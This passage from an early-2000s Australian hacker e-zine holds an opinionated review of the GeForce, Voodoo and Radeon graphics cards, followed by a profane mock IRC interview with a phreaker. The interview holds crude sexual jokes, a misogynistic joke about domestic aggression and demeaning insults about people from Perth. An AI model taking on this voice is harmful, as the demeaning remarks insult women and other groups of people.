3Dfx is dead. Yes, nVidia own them now, go to www.3dfx.com if you must. The Voodoo4/5 was released way after schedule, therefore it just didn't work. Geforce 2 Ultras are now out, although expensive. For the same price as a Voodoo5 you can get the Geforce2 Pro, which looks better in my opinion and has faster FPS. Shh you Voodoo people, no one cares about 'Full-Screen Anti-Aliasing'; the Geforce 2 series (not MX though) can do it easily with a frame loss, but not enough for it to be jerky. Anyway, Voodoo 5 have the SLI technology also, with the Voodoo 5 board (now being manufactured by 3Dfx's arm, STB [or something]), but even with this, it doesn't beat the Geforce 2. The Voodoo 4, meant to be in competition with the Geforce 2 MX, looks better competing with a TNT 2 Ultra; it just can't keep up with the Geforce 2 MX. What's so special about this Geforce I hear you ask?
Well, the Geforce is so special because it has a GPU, Graphics Processing Unit, therefore the CPU doesn't have to do transform and lighting effects; this means the CPU has more time for AI and other features. The Voodoo 5 doesn't have a GPU, .: it sucks. :)

I'll name the variants on the Geforce series (in order of release):

Geforce 256 - nVidia's first Geforce, sold a lot.
Geforce DDR - A Geforce 256, but has DDR (Double Data Rate) so it operates twice per ram clock-cycle.
Geforce 2 GTS - Geforce 256, but with 4 pipelines for textures, DDR ram, fast core, it just means more yummyness! - oh, it also has the nVidia Shader Rasterizer which means shadows look even more shadowy! Woohoo!
Geforce 2 MX - The 'home office' version of the Geforce 2 GTS, has slower SDRAM, but is still 33% faster than the Geforce 256.
Geforce 2 Ultra - Man. This one rocks. The speed is simply awesome, 1600x1200, ABSOLUTELY everything high in Quake 3 with 4x FSAA, and it's still not jerky. It rocks, trust me.
Geforce 2 Pro - A Geforce 2 GTS, but with faster RAM.
Geforce 2 Go! - The Geforce 2 GTS, but with some nifty power saving stuff so it can run in laptops without draining the battery in 0.39 seconds.

ATi has made a comeback with the Radeon, which apparently (never seen one going) looks as good as a Geforce 2 and slightly slower, but still has better drivers etc. But still, I'm yet to see one actually going. I'll update this in Infosurge 9.

What's to come.

Well, with 3Dfx gone, it's up to nVidia and ATi. S3 are gone, they're now Sonic Blue, who do other - non-interesting - stuff. Rendition are gone in my opinion. So, nVidia and ATi, let's have a look. nVidia is releasing the 'NV20' (only a codename) which is speculated to be 7 times faster than the Geforce 2 Ultra; I don't believe it, and think it's just a rumour, plus, it's also rumoured to cost AU$1400, but nothing official is available on it.
ATi is also making the Radeon 2 (speculation again) with a core twice as fast as the current one. I'll post up what I heard in Infosurge 9.

Oooh, Damien has brought me dinner, is that light? Yes! I see daylight, but it hurts my pale closet skin.

Ta ta Folks, until next time.

...............................................................................

#?? Interview with a vampi..... uhhh, irc loser - Fleabag
---------------------------------------------------------

Evening phase5, thank you for taking time out of your busy lifestyle of drinking alone and masturbating to let me interview you.
im not taking time out
im doing both those things
as we speak
Shall we get this baby rocking? Lets...

How did you get into phreaking?
umm
when i was a kid
possibly as soon as i was born
my family bought
or had previously owned a phone
it grew from their i guess

Have you ever had a homosexual experience?
i thought we weren't going to go into this
i dont give permission for my face to be on camera
i want it blurred
blurred
!

Have you ever patted a monkey?
yes
often
I like monkeys.
i like my monkey
tho sometimes i have to beat it
more and more often i have to beat my monkey

Whats your favourite band?
hmm... band
that's a tough question
Just answer it.
i really like that royal crown revue band
they make good music
whenever im down i can listen to it
and laugh my arse off at their shitness
so the answer is red hot chili peppers

Are you single? Uhhh, you don't have to bother answering that one....
moving on...

Do you think the au phreaking scene is dead?
in a way
there isn't really much new innovation
im just in it for the groupie chicks
Aren't we all?
as you can tell, its working

Favorite zine? (Besides infosurge?)
umm
let me think for a bit
actually, i have to go for a piss
back in a few
Okay, I'm going to get another beer.
Damn phase, does it always take you that long to piss?
(Seriously, its been over 10 minutes)
Maybe you should see a doctor?
stfu
umm.. no favourite really
used to like um
phrack, thtj, fk
and the exploit-x issue 1
was krad
So I heard...
and what do you mean 'other than infosurge'?
i wouldnt say that trash is my favourite
I'm asking the questions here.

If you could be any member of the infosurge crew, who would you be?
that phase5 guy
he's cool
other than that
i'd be k
he puts the k in krad
We all want to be k.

Current hardware setup?
umm hardware
this computer
the other one next to it
the 2 386's i hide alcohol in
the p166 i hide alcohol in
umm
the 386 is called woody
and it has a can of woodstock in it
thats irony
or something similar to that
got a dumb terminal as well
and a phone shaped like a football

Who do you think I should interview next? And why?
not lymco
he's from perth
all his answers will be
'yes i want to fuck my relatives'
and
'no.. no electricity yet'
Whos the most interesting person you've ever met online?
and 'fuck cant talk now. uncle jed needs me to backhoe the lawn
herm
slow down
with the questions
stfu
i like to rant
I'll do what I want, and I'll fix it up all neat and shit.
Rant away.
ok
pants
why are they so important
i dont wear them most of the time
someone explain
Are you quite done?
for now

Whos the most interesting person you've ever met online?
umm, most interesting person
i dont know
your kind of a weirdo
could be you
coolest person i met online
doesnt irc tho
so that probably doesnt count
I asked for a name. Not your life story.
i'll come back to it later
Okay..

If you could be any type of smell, what would you be and why?
umm
you know the smell of nutsaq?
not that
something to pickup chicks
so the smell of a stollie

Favorite site?
its a porn site
so i'll give you second favourite
i dont want everyone using its bandwidth
oh shit, phone beeped
wait up
wtf
thesefucks
are messaging me
calling me "jen"
and saying we had a great night last night
this is the second time
in a week
this has happened
this is fucked
Do you really think the people reading IS care?
thats not the fucking point
Just answer my questions and crawl back into your hole.
what was the question again?
oh
www.theonion.com

If you could be a chick for one day, whats the first thing you would do?
are you stealing questions
from picturepoll.com
thats fucking sad
what kind of bullshit interview is this
No. I am not.
Answer the fucking question.
if i was a chick for a day
i'd marry myself
so the next day
i'd have achick
to cook, clean and take my agression

Do you think I'm fat?
in those pants? yes

Thoughts on Project K?
project k demands bananas

Have you ever spoken to the devil?
no
he once felt me up on the bus tho
but i ignored him

Ever woken up screaming 'Oh god, what happened to my penis?!!'?
yes
several times

Know where I can get some 0day pr0n action?
www.thehun.net
has 0hday
i have others
but i dont give out my secrets
phase5 thanks for you time, I'll ask you one more question...
ok

I haven't got anywhere to stay tonight, reckon I could crash at your place?
im sleeping at the park tonight. you're welcome to join me
Thank you phase5. Your thoughts will forever live on in infosurge8....... you fucking sad little weirdo...
guess what
What?
im removing your midget monkey article from is7
you fuck
I hate you.
eric?
is that you?
Pablo?
yes
its me
One more thing zak....
yes?
i'll come back to it later
The people deserve to know.
what was the question?
Whos the most interesting person you've ever met online?
there's no-one really
that stands out as really interesting
not on irc anyway
You said you come back to it, the coolest person.
coolest?
me
Stop being a tight fuck, its your fucking zine, name names.
OK FUCK
LOOK
NO ONE IS FUCKING INTERESTING
YOUR NOT COOL
YOUR SAD FUCKS WITH NO LIVES
i have met one krad person on icq tho
Who was?
and here ends interview
Shit, you really are an alco huh? Please note, phase is hanging to get to the park to drink alone.
fucking yes
its 12:00
i want to go
spend time with jim
my friend
leave me alone
blur my fucking face
blur it

-In conclusion-

phase5 is a creepy little man. He's the type of person who, if you saw him walking towards you on the street, you'd cross the road to avoid. His pastimes include drinking alone in parks, abusing women and masturbating over old #phreak logs. He has a habit of asking people for money and soiled panties. Once upon a time, there was a guy who went well at school and knew the secrets of au phreaking; now there stands a dirty pervert who spends whatever money he makes on alcohol. On the Fleabag Human Rating System (TM) I give phase5 3/10. All three points are for jokes made about lymco's mother that I found somewhat amusing.

Fleabag. 8/12/00

.....................................................

[ ] e o f